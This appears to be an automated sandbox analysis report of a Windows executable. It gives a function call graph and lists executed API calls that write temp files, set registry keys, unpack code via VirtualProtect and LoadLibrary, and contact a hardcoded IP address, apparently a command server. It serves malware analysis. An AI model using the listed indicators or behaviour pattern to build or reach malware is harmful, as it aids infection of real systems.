43 API calls 29149 405ada 29148->29149 29150 402760 43 API calls 29149->29150 29151 405ca0 29150->29151 29490 403ab0 29151->29490 29153 405e9f 29502 406c40 29153->29502 29155 40620c 29156 402460 43 API calls 29155->29156 29157 40621c 29156->29157 29512 402390 29157->29512 29159 406230 29520 406ee0 29159->29520 29161 40630a 29162 402460 43 API calls 29161->29162 29163 40631a 29162->29163 29164 402390 39 API calls 29163->29164 29165 40632e 29164->29165 29166 406404 29165->29166 29167 406336 29165->29167 29583 407290 53 API calls 2 library calls 29166->29583 29575 406f60 53 API calls 2 library calls 29167->29575 29170 406409 29173 402460 43 API calls 29170->29173 29171 40633b 29172 402460 43 API calls 29171->29172 29174 40634b 29172->29174 29175 406419 29173->29175 29576 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29174->29576 29179 402390 39 API calls 29175->29179 29177 406354 29178 402390 39 API calls 29177->29178 29180 40635c 29178->29180 29181 40642d 29179->29181 29577 406ff0 53 API calls 2 library calls 29180->29577 29183 4064ee 29181->29183 29584 407310 53 API calls 2 library calls 29181->29584 29592 407630 53 API calls 2 library calls 29183->29592 29184 406361 29189 402460 43 API calls 29184->29189 29187 40643a 29192 402460 43 API calls 29187->29192 29188 4064f8 29190 402460 43 API calls 29188->29190 29191 406371 29189->29191 29194 406508 29190->29194 29578 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29191->29578 29193 40644a 29192->29193 29585 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29193->29585 29201 402390 39 API calls 29194->29201 29197 40637a 29199 402390 39 API calls 29197->29199 29198 406453 29200 402390 39 API calls 29198->29200 29202 406382 29199->29202 29204 40645b 29200->29204 29205 40651c 29201->29205 29579 407070 53 API calls 2 library calls 29202->29579 29586 407390 53 API calls 2 library calls 29204->29586 29208 406603 29205->29208 29593 4076b0 53 API calls 2 library calls 29205->29593 29206 406387 29214 402460 43 API calls 29206->29214 29603 407a50 53 API calls 2 library calls 29208->29603 29210 406460 29216 402460 43 API calls 29210->29216 29212 40660d 29217 402460 43 API calls 29212->29217 29213 406529 29219 402460 43 API calls 29213->29219 29215 406397 29214->29215 29223 402390 39 API calls 29215->29223 29218 406470 29216->29218 29220 40661d 29217->29220 29587 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29218->29587 29222 406539 29219->29222 29231 402390 39 API calls 29220->29231 29594 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29222->29594 29226 4063ab 29223->29226 29224 406479 29227 402390 39 API calls 29224->29227 29229 4063cc 29226->29229 29230 4063af 29226->29230 29232 406481 29227->29232 29228 406542 29233 402390 39 API calls 29228->29233 29581 407180 53 API calls 2 library calls 29229->29581 29580 407100 53 API calls 2 library calls 29230->29580 29237 406631 29231->29237 29588 407410 53 API calls 2 library calls 29232->29588 29234 40654a 29233->29234 29595 407730 53 API calls 2 library calls 29234->29595 29243 4066b3 29237->29243 29244 406635 29237->29244 29239 406486 29250 402460 43 API calls 29239->29250 29241 4063d1 29251 402460 43 API calls 29241->29251 29242 4063b4 29252 402460 43 API calls 29242->29252 29610 407c70 53 API calls 2 library calls 29243->29610 29604 407ae0 53 API calls 2 library calls 29244->29604 29245 40654f 29254 402460 43 API calls 29245->29254 29248 4066b8 29256 402460 43 API calls 29248->29256 29249 40663a 29257 402460 43 API calls 29249->29257 29253 406496 29250->29253 29255 4063e1 29251->29255 29431 4063c4 29252->29431 29265 402390 39 API calls 29253->29265 29258 40655f 29254->29258 29267 402390 39 API calls 29255->29267 29259 4066c8 29256->29259 29260 40664a 29257->29260 29596 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29258->29596 29274 402390 39 API calls 29259->29274 29605 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29260->29605 29263 406875 29268 402390 39 API calls 29263->29268 29270 4064aa 29265->29270 29266 406568 29271 402390 39 API calls 29266->29271 29272 4063f5 29267->29272 29273 4066a7 29268->29273 29269 406653 29275 402390 39 API calls 29269->29275 29276 4064b8 29270->29276 29277 4064ae 29270->29277 29278 406570 29271->29278 29272->29273 29582 407210 53 API calls 2 library calls 29272->29582 29530 4017a0 29273->29530 29279 4066dc 29274->29279 29280 40665b 29275->29280 29590 407520 53 API calls 2 library calls 29276->29590 29589 4074a0 53 API calls 2 library calls 29277->29589 29597 4077b0 53 API calls 2 library calls 29278->29597 29286 4066e0 29279->29286 29287 40675e 29279->29287 29606 407b60 53 API calls 2 library calls 29280->29606 29611 407d00 53 API calls 2 library calls 29286->29611 29617 407e80 53 API calls 2 library calls 29287->29617 29289 406575 29300 402460 43 API calls 29289->29300 29290 4064bd 29298 402460 43 API calls 29290->29298 29291 4068a1 29534 4083f0 29291->29534 29294 406660 29303 402460 43 API calls 29294->29303 29296 406763 29305 402460 43 API calls 29296->29305 29297 4066e5 29306 402460 43 API calls 29297->29306 29302 4064cd 29298->29302 29299 4068aa 29309 402460 43 API calls 29299->29309 29301 406585 29300->29301 29598 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29301->29598 29314 402390 39 API calls 29302->29314 29307 406670 29303->29307 29310 406773 29305->29310 29311 4066f5 29306->29311 29607 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29307->29607 29308 40658e 29313 402390 39 API calls 29308->29313 29315 4068bd 29309->29315 29327 402390 39 API calls 29310->29327 29612 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29311->29612 29319 406596 29313->29319 29320 4064e1 29314->29320 29544 408370 29315->29544 29317 406679 29318 402390 39 API calls 29317->29318 29324 406681 29318->29324 29599 407830 53 API calls 2 library calls 29319->29599 29320->29273 29591 4075b0 53 API calls 2 library calls 29320->29591 29322 4066fe 29323 402390 39 API calls 29322->29323 29329 406706 29323->29329 29608 407bf0 53 API calls 2 library calls 29324->29608 29326 4068c8 29337 402460 43 API calls 29326->29337 29328 406787 29327->29328 29333 40678b 29328->29333 29334 4067de 29328->29334 29613 407d80 53 API calls 2 library calls 29329->29613 29331 40659b 29343 402460 43 API calls 29331->29343 29618 407f10 53 API calls 2 library calls 29333->29618 29623 4080d0 53 API calls 2 library calls 29334->29623 29336 406686 29346 402460 43 API calls 29336->29346 29341 4068db 29337->29341 29339 40670b 29349 402460 43 API calls 29339->29349 29554 4082d0 29341->29554 29342 406790 29351 402460 43 API calls 29342->29351 29347 4065ab 29343->29347 29344 4067e3 29354 402460 43 API calls 29344->29354 29350 406696 29346->29350 29358 402390 39 API calls 29347->29358 29348 4068e6 29360 402460 43 API calls 29348->29360 29352 40671b 29349->29352 29609 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29350->29609 29355 4067a0 29351->29355 29614 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29352->29614 29359 4067f3 29354->29359 29619 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29355->29619 29357 40669f 29363 402390 39 API calls 29357->29363 29364 4065bf 29358->29364 29370 402390 39 API calls 29359->29370 29365 4068f9 29360->29365 29362 406724 29367 402390 39 API calls 29362->29367 29363->29273 29368 4065c8 29364->29368 29600 4078c0 53 API calls 2 library calls 29364->29600 29564 408da0 29365->29564 29366 4067a9 29373 402390 39 API calls 29366->29373 29374 40672c 29367->29374 29601 407940 53 API calls 2 library calls 29368->29601 29375 406807 29370->29375 29378 4067b1 29373->29378 29615 407e00 53 API calls 2 library calls 29374->29615 29375->29273 29624 408150 53 API calls 2 library calls 29375->29624 29376 4065d2 29387 402460 43 API calls 29376->29387 29620 407fd0 53 API calls 2 library calls 29378->29620 29382 406731 29389 402460 43 API calls 29382->29389 29384 406926 29572 408eb0 29384->29572 29385 4067b6 29392 402460 43 API calls 29385->29392 29386 406810 29397 402460 43 API calls 29386->29397 29390 4065e2 29387->29390 29393 406741 29389->29393 29403 402390 39 API calls 29390->29403 29395 4067c6 29392->29395 29616 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29393->29616 29394 408e00 43 API calls 29398 406953 29394->29398 29621 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29395->29621 29402 406820 29397->29402 29399 408eb0 43 API calls 29398->29399 29404 406968 29399->29404 29401 40674a 29406 402390 39 API calls 29401->29406 29625 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29402->29625 29408 4065f6 29403->29408 29409 408e00 43 API calls 29404->29409 29405 4067cf 29410 402390 39 API calls 29405->29410 29406->29273 29408->29273 29602 4079d0 53 API calls 2 library calls 29408->29602 29412 406980 29409->29412 29413 4067d7 29410->29413 29411 406829 29414 402390 39 API calls 29411->29414 29416 402390 39 API calls 29412->29416 29622 408050 53 API calls 2 library calls 29413->29622 29418 406831 29414->29418 29419 40698e 29416->29419 29626 4081d0 53 API calls 2 library calls 29418->29626 29421 402390 39 API calls 29419->29421 29423 406999 29421->29423 29422 406836 29426 402460 43 API calls 29422->29426 29424 402390 39 API calls 29423->29424 29427 4069a4 29424->29427 29425 4067dc 29428 402460 43 API calls 29425->29428 29429 406846 29426->29429 29430 402390 39 API calls 29427->29430 29428->29431 29627 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29429->29627 29433 4069af 29430->29433 29629 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29431->29629 29435 402390 39 API calls 29433->29435 29434 40684f 29436 402390 39 API calls 29434->29436 29437 4069ba 29435->29437 29438 406857 29436->29438 29439 402390 39 API calls 29437->29439 29628 408250 53 API calls 2 library calls 29438->29628 29441 4069c5 29439->29441 29442 402390 39 API calls 29441->29442 29443 4069d0 29442->29443 29444 402390 39 API calls 29443->29444 29447 4069df 29444->29447 29445 406a3e Sleep 29445->29447 29446 402460 43 API calls 29446->29447 29447->29445 29447->29446 29448 406a47 29447->29448 29449 402390 39 API calls 29448->29449 29450 406a4f 29449->29450 29630 408c80 43 API calls 2 library calls 29450->29630 29452 406a60 29631 408c80 43 API calls 2 library calls 29452->29631 29454 406a79 29632 408c80 43 API calls 2 library calls 29454->29632 29456 406a8c 29633 404f70 130 API calls 6 library calls 29456->29633 29459 402830 29458->29459 29460 40277f 29458->29460 29476 401600 43 API calls 3 library calls 29459->29476 29461 40278b __InternalCxxFrameHandler 29460->29461 29463 4027b3 29460->29463 29465 4027f7 29460->29465 29466 4027ee 29460->29466 29461->29142 29474 401560 41 API calls 3 library calls 29463->29474 29464 402835 29477 401560 41 API calls 2 library calls 29464->29477 29473 4027cf __InternalCxxFrameHandler 29465->29473 29475 401560 41 API calls 3 library calls 29465->29475 29466->29463 29466->29464 29471 4027c6 29471->29473 29478 40cfef 29471->29478 29473->29142 29474->29471 29475->29473 29476->29464 29477->29471 29483 40cf2b 39 API calls ___std_exception_copy 29478->29483 29480 40cffe 29484 40d00c 11 API calls __FrameHandler3::FrameUnwindToState 29480->29484 29482 40d00b 29483->29480 29484->29482 29486 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 29485->29486 29486->29145 29634 4128e2 GetLastError 29487->29634 29501 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29490->29501 29494 403c33 29494->29153 29495 403b8d 29496 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29495->29496 29497 403c37 29495->29497 29673 409a17 29496->29673 29499 40cfef 39 API calls 29497->29499 29498 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29498->29496 29498->29497 29681 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29498->29681 29500 403c3c 29499->29500 29501->29497 29501->29498 29680 408c80 43 API calls 2 library calls 29501->29680 29503 406c6c 29502->29503 29511 406c9e 29502->29511 29683 409cc5 6 API calls 29503->29683 29505 409a17 CatchGuardHandler 5 API calls 29507 406cb0 29505->29507 29506 406c76 29506->29511 29684 409fd7 42 API calls 29506->29684 29507->29155 29509 406c94 29685 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29509->29685 29511->29505 29513 40239b 29512->29513 29514 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29512->29514 29513->29514 29515 40cfef 39 API calls 29513->29515 29514->29159 29516 4023da 29515->29516 29517 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29516->29517 29518 40cfef 39 API calls 29516->29518 29517->29159 29519 40245c 29518->29519 29521 406f0e 29520->29521 29529 406f48 29520->29529 29686 409cc5 6 API calls 29521->29686 29523 409a17 CatchGuardHandler 5 API calls 29524 406f5b 29523->29524 29524->29161 29525 406f18 29525->29529 29687 409fd7 42 API calls 29525->29687 29527 406f3e 29688 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29527->29688 29529->29523 29531 4017b3 __FrameHandler3::FrameUnwindToState 29530->29531 29689 409b8a 29531->29689 29533 4017ca __FrameHandler3::FrameUnwindToState 29533->29291 29535 408422 29534->29535 29543 40845e 29534->29543 29716 409cc5 6 API calls 29535->29716 29537 409a17 CatchGuardHandler 5 API calls 29539 408470 29537->29539 29538 40842c 29538->29543 29717 409fd7 42 API calls 29538->29717 29539->29299 29541 408454 29718 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29541->29718 29543->29537 29545 4083ce 29544->29545 29546 40839c 29544->29546 29548 409a17 CatchGuardHandler 5 API calls 29545->29548 29719 409cc5 6 API calls 29546->29719 29550 4083e0 29548->29550 29549 4083a6 29549->29545 29720 409fd7 42 API calls 29549->29720 29550->29326 29552 4083c4 29721 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29552->29721 29555 40830d 29554->29555 29563 408352 29554->29563 29722 409cc5 6 API calls 29555->29722 29557 409a17 CatchGuardHandler 5 API calls 29558 408365 29557->29558 29558->29348 29559 408317 29559->29563 29723 409fd7 42 API calls 29559->29723 29561 408348 29724 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29561->29724 29563->29557 29565 408db4 29564->29565 29725 409310 29565->29725 29567 40690e 29568 408e00 29567->29568 29569 408e1b 29568->29569 29570 408e2f __InternalCxxFrameHandler 29569->29570 29731 402840 43 API calls 3 library calls 29569->29731 29570->29384 29732 409130 29572->29732 29574 40693b 29574->29394 29575->29171 29576->29177 29577->29184 29578->29197 29579->29206 29580->29242 29581->29241 29582->29242 29583->29170 29584->29187 29585->29198 29586->29210 29587->29224 29588->29239 29589->29242 29590->29290 29591->29183 29592->29188 29593->29213 29594->29228 29595->29245 29596->29266 29597->29289 29598->29308 29599->29331 29600->29368 29601->29376 29602->29208 29603->29212 29604->29249 29605->29269 29606->29294 29607->29317 29608->29336 29609->29357 29610->29248 29611->29297 29612->29322 29613->29339 29614->29362 29615->29382 29616->29401 29617->29296 29618->29342 29619->29366 29620->29385 29621->29405 29622->29425 29623->29344 29624->29386 29625->29411 29626->29422 29627->29434 29628->29425 29629->29263 29630->29452 29631->29454 29632->29456 29635 4128f8 29634->29635 29638 4128fe 29634->29638 29663 4135a6 6 API calls _unexpected 29635->29663 29640 412902 29638->29640 29664 4135e5 6 API calls _unexpected 29638->29664 29639 41291a 29639->29640 29641 412922 29639->29641 29642 412987 SetLastError 29640->29642 29665 413294 14 API calls 2 library calls 29641->29665 29645 405aa8 Sleep 29642->29645 29646 412997 29642->29646 29644 41292f 29648 412937 29644->29648 29649 412948 29644->29649 29645->29148 29672 411109 39 API calls __FrameHandler3::FrameUnwindToState 29646->29672 29666 4135e5 6 API calls _unexpected 29648->29666 29667 4135e5 6 API calls _unexpected 29649->29667 29653 412954 29655 412958 29653->29655 29656 41296f 29653->29656 29654 412945 29669 4132f1 14 API calls __dosmaperr 29654->29669 29668 4135e5 6 API calls _unexpected 29655->29668 29670 412710 14 API calls _unexpected 29656->29670 29660 41297a 29671 4132f1 14 API calls __dosmaperr 29660->29671 29662 41296c 29662->29642 29663->29638 29664->29639 29665->29644 29666->29654 29667->29653 29668->29654 29669->29662 29670->29660 29671->29662 29674 409a20 IsProcessorFeaturePresent 29673->29674 29675 409a1f 29673->29675 29677 409a67 29674->29677 29675->29494 29682 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29677->29682 29679 409b4a 29679->29494 29680->29501 29681->29495 29682->29679 29683->29506 29684->29509 29685->29511 29686->29525 29687->29527 29688->29529 29691 409b4c 29689->29691 29692 409b6b 29691->29692 29694 409b6d 29691->29694 29703 40fb4d 29691->29703 29712 4116b2 EnterCriticalSection LeaveCriticalSection _unexpected 29691->29712 29692->29533 29695 401560 Concurrency::cancel_current_task 29694->29695 29696 409b77 29694->29696 29710 40af80 RaiseException 29695->29710 29713 40af80 RaiseException 29696->29713 29699 40157c 29711 40ad31 40 API calls ___std_exception_copy 29699->29711 29701 40a589 29702 4015a3 29702->29533 29708 413cb9 _unexpected 29703->29708 29704 413cf7 29715 40d0dd 14 API calls __dosmaperr 29704->29715 29705 413ce2 RtlAllocateHeap 29707 413cf5 29705->29707 29705->29708 29707->29691 29708->29704 29708->29705 29714 4116b2 EnterCriticalSection LeaveCriticalSection _unexpected 29708->29714 29710->29699 29711->29702 29712->29691 29713->29701 29714->29708 29715->29707 29716->29538 29717->29541 29718->29543 29719->29549 29720->29552 29721->29545 29722->29559 29723->29561 29724->29563 29726 409398 29725->29726 29729 40932a __InternalCxxFrameHandler 29725->29729 29730 4095d0 43 API calls 4 library calls 29726->29730 29728 4093aa 29728->29567 29729->29567 29730->29728 29731->29570 29733 409173 29732->29733 29734 4092fd 29733->29734 29735 40923d 29733->29735 29740 409178 __InternalCxxFrameHandler 29733->29740 29751 401600 43 API calls 3 library calls 29734->29751 29739 409272 29735->29739 29741 409298 29735->29741 29737 409302 29752 401560 41 API calls 2 library calls 29737->29752 29739->29737 29743 40927d 29739->29743 29740->29574 29748 40928a __InternalCxxFrameHandler 29741->29748 29750 401560 41 API calls 3 library calls 29741->29750 29742 409283 29745 40cfef 39 API calls 29742->29745 29742->29748 29749 401560 41 API calls 3 library calls 29743->29749 29747 40930c 29745->29747 29748->29574 29749->29742 29750->29748 29751->29737 29752->29742 29753 5f593a 29754 5fa2a1 29753->29754 29755 5fa2fb RegOpenKeyA 29754->29755 29756 5fa2d4 RegOpenKeyA 29754->29756 29758 5f5d9d 29755->29758 29756->29755 29757 5fa2f1 29756->29757 29757->29755 29759 6f2834 29760 6f283d 29759->29760 29761 6f2845 29760->29761 29762 6f27d0 VirtualProtect 29760->29762 29763 6f27f0 29762->29763 29764 493003c 29765 4930049 29764->29765 29766 493004c 29764->29766 29780 4930e0f SetErrorMode SetErrorMode 29766->29780 29771 4930265 29772 49302ce VirtualProtect 29771->29772 29774 493030b 29772->29774 29773 4930439 VirtualFree 29778 49305f4 LoadLibraryA 29773->29778 29779 49304be 29773->29779 29774->29773 29775 49304e3 LoadLibraryA 29775->29779 29777 49308c7 29778->29777 29779->29775 29779->29778 29781 4930223 29780->29781 29782 4930d90 29781->29782 29783 4930dad 29782->29783 29784 4930dbb GetPEB 29783->29784 29785 4930238 VirtualAlloc 29783->29785 29784->29785 29785->29771

                        Executed Functions

                        Function 00403D40 Relevance: 57.8, APIs: 25, Strings: 7, Instructions: 1839sleepcomCOMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathA.KERNEL32(00000104,?,8F925C9F,75920F00,00000000), ref: 00403DAA
                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                        • Sleep.KERNEL32(000003E8), ref: 00403F42
                        • __Init_thread_footer.LIBCMT ref: 00404517
                        • __Init_thread_footer.LIBCMT ref: 004046DD
                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                        • __Init_thread_footer.LIBCMT ref: 00404975
                        • __Init_thread_footer.LIBCMT ref: 00404BDE
                        • CoInitialize.OLE32(00000000), ref: 00404C5F
                        • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                        • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                        • __Init_thread_footer.LIBCMT ref: 00404046
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                          • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                          • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                          • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                        • __Init_thread_footer.LIBCMT ref: 00404222
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                        • API String ID: 995133137-3578497191
                        • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                        • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                        Function 00404F70 Relevance: 45.4, APIs: 16, Strings: 9, Instructions: 1645sleepregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 512 40512d-405150 510->512 513 4050ee-405128 510->513 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 512->515 513->512 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 535 4052b6-4052b8 533->535 536 405287-405296 533->536 537 405253-40525a call 409b7c 534->537 538 40523f-40524d 534->538 543 4052f0-4052fb Sleep 535->543 544 4052ba-4052cd 535->544 541 405298-4052a6 536->541 542 4052ac-4052b3 call 409b7c 536->542 537->533 538->537 539 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 538->539 554 4059b0-4059c8 539->554 555 405984-405990 539->555 541->539 541->542 542->535 543->509 548 4052d0-4052d5 544->548 548->548 551 4052d7-4052e9 call 4024a0 548->551 551->543 561 4052eb-4052ee 551->561 557 4059f2-405a0a 554->557 558 4059ca-4059d6 554->558 559 405992-4059a0 555->559 560 4059a6-4059ad call 409b7c 555->560 567 405a34-405a41 call 409a17 557->567 568 405a0c-405a18 557->568 565 4059e8-4059ef call 409b7c 558->565 566 4059d8-4059e6 558->566 559->560 562 405a42-405a47 call 40cfef 559->562 560->554 561->543 563 405300-405389 call 40b570 call 409b8a call 40b570 561->563 586 405390-4053a2 563->586 565->557 566->562 566->565 574 405a2a-405a31 call 409b7c 568->574 575 405a1a-405a28 568->575 574->567 575->562 575->574 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 589 4053fc-4053fe 587->589 590 40540d-405430 587->590 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 592 405400-40540b 589->592 593 405433-405438 590->593 592->590 592->592 593->593 595 40543a-4054dc call 402760 call 409310 593->595 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 615 405596-405598 611->615 616 405567-405576 611->616 613 405533-40553a call 409b7c 612->613 614 40551f-40552d 612->614 613->611 614->539 614->613 620 405693-40569c 615->620 621 40559e-4055a5 615->621 618 405578-405586 616->618 619 40558c-405593 call 409b7c 616->619 618->539 618->619 619->615 620->586 625 4056a2 620->625 621->620 622 4055ab-4055b3 621->622 626 4055b9-4055bc 622->626 627 40568d 622->627 629 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 625->629 626->627 630 4055c2-4055ea call 40fb4d 626->630 627->620 658 405807-40580d 629->658 659 4057db-4057e7 629->659 637 4055f0-405602 call 40aff0 630->637 638 4055ec-4055ee 630->638 640 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 637->640 638->640 640->627 662 40565e-405669 call 403430 640->662 660 40583b-405853 658->660 661 40580f-40581b 658->661 663 4057e9-4057f7 659->663 664 4057fd-405804 call 409b7c 659->664 668 405855-405861 660->668 669 40587d-405895 660->669 665 405831-405838 call 409b7c 661->665 666 40581d-40582b 661->666 662->627 680 40566b-405679 call 403430 662->680 663->539 663->664 664->658 665->660 666->539 666->665 673 405873-40587a call 409b7c 668->673 674 405863-405871 668->674 675 405897-4058a3 669->675 676 4058bf-4058dc call 409a17 669->676 673->669 674->539 674->673 682 4058b5-4058bc call 409b7c 675->682 683 4058a5-4058b3 675->683 676->539 680->627 690 40567b-40568b call 403430 680->690 682->676 683->539 683->682 690->627 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 705->704 707 40576a-40576f Sleep 705->707 706->629 707->629
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • Sleep.KERNEL32(000007D0), ref: 00405755
                        • Sleep.KERNEL32(000007D0), ref: 0040576F
                        • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
